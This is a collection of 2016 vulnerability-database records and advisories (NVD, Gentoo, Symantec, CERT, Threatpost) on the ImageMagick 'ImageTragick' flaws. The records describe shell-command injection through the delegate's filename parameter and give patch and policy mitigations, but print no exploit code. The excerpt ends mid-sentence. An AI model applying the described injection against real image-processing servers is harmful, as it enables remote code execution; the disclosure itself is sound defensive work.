{"lastseen": "2021-02-02T06:28:06", "description": "The MSL coder in ImageMagick before 6.9.3-10 and 7.x before 7.0.1-1 allows remote attackers to move arbitrary files via a crafted image.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 3.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-05-05T18:59:00", "title": "CVE-2016-3716", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3716"], "modified": "2018-10-09T20:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.7z", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:imagemagick:imagemagick:7.0.1-0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node:6.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/a:imagemagick:imagemagick:6.9.3-9", "cpe:/a:imagemagick:imagemagick:7.0.0-0", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2016-3716", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3716", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:imagemagick:imagemagick:7.0.1-0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.9.3-9:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.7z:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:7.0.0-0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:28:06", "description": "The EPHEMERAL coder in ImageMagick before 6.9.3-10 and 7.x before 7.0.1-1 allows remote attackers to delete arbitrary files via a crafted image.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-05-05T18:59:00", "title": "CVE-2016-3715", "type": "cve", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715"], "modified": "2018-10-09T19:59:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.7z", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:imagemagick:imagemagick:7.0.1-0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node:6.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/a:imagemagick:imagemagick:6.9.3-9", "cpe:/a:imagemagick:imagemagick:7.0.0-0", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2016-3715", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3715", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:imagemagick:imagemagick:7.0.1-0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.9.3-9:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.7z:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:7.0.0-0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:28:06", "description": "The (1) EPHEMERAL, (2) HTTPS, (3) MVG, (4) MSL, (5) TEXT, (6) SHOW, (7) WIN, and (8) PLT coders in ImageMagick before 6.9.3-10 and 7.x before 7.0.1-1 allow remote attackers to execute arbitrary code via shell metacharacters in a crafted image, aka \"ImageTragick.\"", "edition": 6, "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-05T18:59:00", "title": "CVE-2016-3714", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714"], "modified": "2019-04-15T13:29:00", "cpe": ["cpe:/o:suse:suse_linux_enterprise_server:12", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:opensuse:leap:42.1", "cpe:/a:imagemagick:imagemagick:7.0.1-0", "cpe:/a:imagemagick:imagemagick:6.9.3-9", "cpe:/a:imagemagick:imagemagick:7.0.0-0", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2016-3714", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3714", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:7.0.1-0:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.9.3-9:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_server:12:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:7.0.0-0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:28:06", "description": "The (1) HTTP and (2) FTP coders in ImageMagick before 6.9.3-10 and 7.x before 7.0.1-1 allow remote attackers to conduct server-side request forgery (SSRF) attacks via a crafted image.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 4.0}, "published": "2016-05-05T18:59:00", "title": "CVE-2016-3718", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3718"], "modified": "2018-10-09T20:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.7z", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:imagemagick:imagemagick:7.0.1-0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node:6.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/a:imagemagick:imagemagick:6.9.3-9", "cpe:/a:imagemagick:imagemagick:7.0.0-0", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2016-3718", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3718", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:imagemagick:imagemagick:7.0.1-0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.9.3-9:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.7z:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:7.0.0-0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}], "gentoo": [{"lastseen": "2016-12-01T00:54:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-7799", "CVE-2016-6491", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-7906", "CVE-2016-5842", "CVE-2016-3718", "CVE-2016-5010", "CVE-2016-3717"], "edition": 1, "description": "### Background\n\nImageMagick is a collection of tools and libraries for many image formats. \n\n### Description\n\nMultiple vulnerabilities have been discovered in ImageMagick. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll ImageMagick users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-gfx/imagemagick-6.9.6.2\"", "modified": "2016-11-30T00:00:00", "published": "2016-11-30T00:00:00", "href": "https://security.gentoo.org/glsa/201611-21", "id": "GLSA-201611-21", "type": "gentoo", "title": "ImageMagick: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "symantec": [{"lastseen": "2020-12-24T10:40:51", "bulletinFamily": "software", "cvelist": ["CVE-2016-3714"], "description": "### SUMMARY\n\n \n\n\nSymantec Network Protection products using affected versions of ImageMagick are susceptible to the ImageTragick security vulnerability. A remote attacker can send crafted images and execute arbitrary code on the target.\n\n### AFFECTED PRODUCTS\n\n \n\n\nThe following products are vulnerable:\n\n**Security Analytics** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 7.3 | Not vulnerable, fixed in 7.3.1 \n7.2 | Not available at this time \n7.1 | Not available at this time \n \n### ADDITIONAL PRODUCT INFORMATION\n\n \n\n\nSecurity Analytics is only vulnerable through intercepted network traffic.\n\nThe following products are not vulnerable: \n****Advanced Secure Gateway** \nAndroid Mobile Agent \n**AuthConnector \nBCAAA** \nBlue Coat HSM Agent for the Luna SP \n**CacheFlow** \nClient Connector \n****Cloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection for Oracle Field Service Cloud \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nContent Analysis \nDirector** \nGeneral Auth Connector Login Application** \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \n******Mail Threat Defense \n**Malware Analysis**** \nManagement Center** \nNorman Shark Industrial Control System Protection \nPacketShaper \n**PacketShaper S-Series** \nPolicyCenter \n****PolicyCenter S-Series \nProxyAV \nProxyAV ConLog and ConLogXP****** \nProxyClient \n**ProxySG \n**Reporter** \nSSL Visibility** \nUnified Agent \nX-Series XOS**\n\n### ISSUES\n\n \n**CVE-2016-3714** \n--- \n**Severity / CVSSv2** | High / 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n**References** | SecurityFocus: [BID 89848](<http://www.securityfocus.com/bid/89848>) / NVD: [CVE-2016-3714](<https://nvd.nist.gov/vuln/detail/CVE-2016-3714>) \n**Impact** | Code execution \n**Description** | An insufficient input validation flaw in multiple ImageMagick coders allows a remote attacker to send crafted images with injected OS shell commands. The attacker can execute arbitrary code on the target system with the privileges of the ImageMagick application. \n \n### MITIGATION\n\n \n\n\nSymantec's ProxySG 6.6 and 6.7 web application firewall (WAF) solution can protect network servers against some ImageTragick attack vectors. The WAF Command Injection engine, when configured to scan HTTP requests, can block HTTP POST requests containing crafted images with injected OS commands.\n\n### REFERENCES\n\n \n\n\nImageTragick - <https://imagetragick.com/>\n\n### REVISION\n\n \n\n\n2019-01-17 IntelligenceCenter and IntelligenceCenter Data Collector are not vulnerable. Advisory Status moved to Closed. \n2017-07-05 initial public release\n", "modified": "2019-01-17T20:47:45", "published": "2017-07-05T08:00:00", "id": "SMNTC-1408", "href": "", "type": "symantec", "title": "SA151: ImageMagick RCE Vulnerability (ImageTragick)", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:41:38", "bulletinFamily": "info", "cvelist": ["CVE-2016-3714"], "description": "### Overview \n\nImageMagick does not properly validate user input before processing it using a delegate, which may lead to arbitrary code execution. This issue is also known as \"ImageTragick\".\n\n### Description \n\n[**CWE-20**](<http://cwe.mitre.org/data/definitions/20.html>)**: Improper Input Validation - **CVE-2016-3714\n\nAccording to the researchers in a mailing list [post](<http://www.openwall.com/lists/oss-security/2016/05/03/18>): \n \n_Insufficient filtering for filename passed to delegate's command allows remote code execution during conversion of several file formats._ \n \n_ImageMagick allows to process files with external libraries. This feature is called 'delegate'. It is implemented as a system() with command string ('command') from the config file delegates.xml with actual value for different params (input/output filenames etc). Due to insufficient %M param filtering it is possible to conduct shell command injection._ \n \nBy causing a system to process an image with ImageMagick, an attacker may be able to execute arbitrary commands on a vulnerable system. A common vulnerable configuration would be a web server that allows image uploads that are subsequently processed with ImageMagick. \n \nExploit code for this vulnerability is publicly available, and according to the [ImageTragick](<https://imagetragick.com/>) website, this vulnerability is already being exploited in the wild. \n \n--- \n \n### Impact \n\nAn unauthenticated remote attacker that can upload crafted image files may be able to execute arbitrary code in the context of the user calling ImageMagick. \n \n--- \n \n### Solution \n\n**Apply an Update** \n \nImageMagick version 6.9.3-10 and 7.0.1-1 have been released to address these issues. Affected users should update to the latest version of ImageMagick as soon as possible. \n \nHowever, affected users may also apply the following mitigations: \n \n--- \n \n**Verify Files and Disable Vulnerable Filters** \n \nThe researchers suggest that this vulnerability may be mitigated by doing the following: \n \n1\\. Verify that all image files begin with the expected \"magic bytes\" corresponding to the image file types you support before sending them to ImageMagick for processing. \n2\\. Use a policy file to disable the vulnerable ImageMagick coders. \n \nFor more details, please see <https://imagetragick.com/> \n \n--- \n \n### Vendor Information\n\n250519\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Arch Linux Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### CentOS Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Debian GNU/Linux Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fedora Project Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Gentoo Linux Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ImageMagick Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Red Hat, Inc. Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SUSE Linux Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Slackware Linux Inc. Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Turbolinux Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubuntu Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### openSUSE project Affected\n\nUpdated: May 04, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\nView all 12 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C \nTemporal | 7.3 | E:POC/RL:OF/RC:C \nEnvironmental | 7.3 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://imagetragick.com/>\n * [https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588](<https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588>)\n * <http://www.openwall.com/lists/oss-security/2016/05/03/18>\n\n### Acknowledgements\n\nThe ImageTragick website credits Stewie and Nikolay Ermishkin of the Mail.Ru Security Team for discovering these vulnerabilities.\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2016-3714](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-3714>) \n---|--- \n**Date Public:** | 2016-05-03 \n**Date First Published:** | 2016-05-04 \n**Date Last Updated: ** | 2016-05-04 21:14 UTC \n**Document Revision: ** | 21 \n", "modified": "2016-05-04T21:14:00", "published": "2016-05-04T00:00:00", "id": "VU:250519", "href": "https://www.kb.cert.org/vuls/id/250519", "type": "cert", "title": "ImageMagick does not properly validate input before processing images using a delegate", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:55:23", "bulletinFamily": "info", "cvelist": ["CVE-2016-3714"], "description": "Within hours of the disclosure of serious vulnerabilities in ImageMagick, public exploits were available increasing the risk to thousands of websites that make use of the open source image-processing software.\n\nAttackers can append malicious code to an image file that ImageMagick will process without question, leading to, in the case of one of the vulnerabilities, remote code execution. The scope of the issue is severe since image-processing plugins such as PHP imagick, Ruby rmagick and Ruby paperclip, and nodeJS imagemagick among others are built on top of the ImageMagick library.\n\nResearcher Ryan Huber was among the first on Tuesday to publicly disclose that ImageMagick had a problem. A researcher from the Mail.ru team in Russia who goes by the handle Stewie found the flaw, while Nikolay Ermishkin, also of the Mail.ru team, found the remote code execution issue.\n\n\u201cWe have collectively determined that these vulnerabilities are available to individuals other than the person(s) who discovered them,\u201d Huber wrote on the [ImageTragick website](<https://imagetragick.com/>), a landing page complete with FAQ on the bugs. \u201cAn unknowable number of people having access to these vulnerabilities makes this a critical issue for everyone using this software.\u201d\n\nResearcher Dan Tentler yesterday afternoon tweeted that he had come up with a working proof-of-concept exploit, and today [an exploit developed by Ermishkin](<http://www.openwall.com/lists/oss-security/2016/05/03/18>) was posted to the OSS-Security mailing list.\n\n> Done. \nWeaponized exploit. [pic.twitter.com/PtrY6wf7DT](<https://t.co/PtrY6wf7DT>)\n> \n> \u2014 Dan Tentler (@Viss) [May 3, 2016](<https://twitter.com/Viss/status/727625561179201536>)\n\nHuber and Ermishkin warned in their respective posts that websites that process user-submitted images are particularly at risk to public exploits.\n\nErmishkin privately disclosed the bugs to ImageMagick\u2019s developers who pushed out a fix on April 30; Ermishkin, however, said the fix was incomplete and work continues on a new patch.\n\nImageMagick, meanwhile, yesterday posted a mitigation to its forums. They suggest adding the following code to the ImageMagick policy.xml file.\n\n<policy domain=\u201dcoder\u201d rights=\u201dnone\u201d pattern=\u201dEPHEMERAL\u201d /> \n<policy domain=\u201dcoder\u201d rights=\u201dnone\u201d pattern=\u201dHTTPS\u201d /> \n<policy domain=\u201dcoder\u201d rights=\u201dnone\u201d pattern=\u201dMVG\u201d /> \n<policy domain=\u201dcoder\u201d rights=\u201dnone\u201d pattern=\u201dMSL\u201d />\n\n\u201cWe have secured these coders in ImageMagick 7.0.1-1 and 6.9.3-10 (available by this weekend) by sanitizing the HTTPS parameters and preventing indirect reads with this policy: <policy domain=\u201dpath\u201d rights=\u201dnone\u201d pattern=\u201d@*\u201d />\u201d ImageMagick said. \u201cIf you require the HTTPS, MVG, or MSL coders, the above policy is sufficient to prevent exploits.\u201d\n\nHuber also suggested a pair of mitigations: that users verify that image files begin with the proper \u201cmagic bytes\u201d that correspond to image file types before ImageMagick processes them; and the use of policy files to disable vulnerable ImageMagick coders.\n\nThe vulnerabilities, covered in CVE-2016-3714, are described as insufficient shell character filtering.\n\nFrom the advisory:\n\n> \u201cImageMagick allows to process files with external libraries. This feature is called \u2018delegate\u2019. It is implemented as a system() with command string (\u2018command\u2019) from the config file delegates.xml with actual value for different params 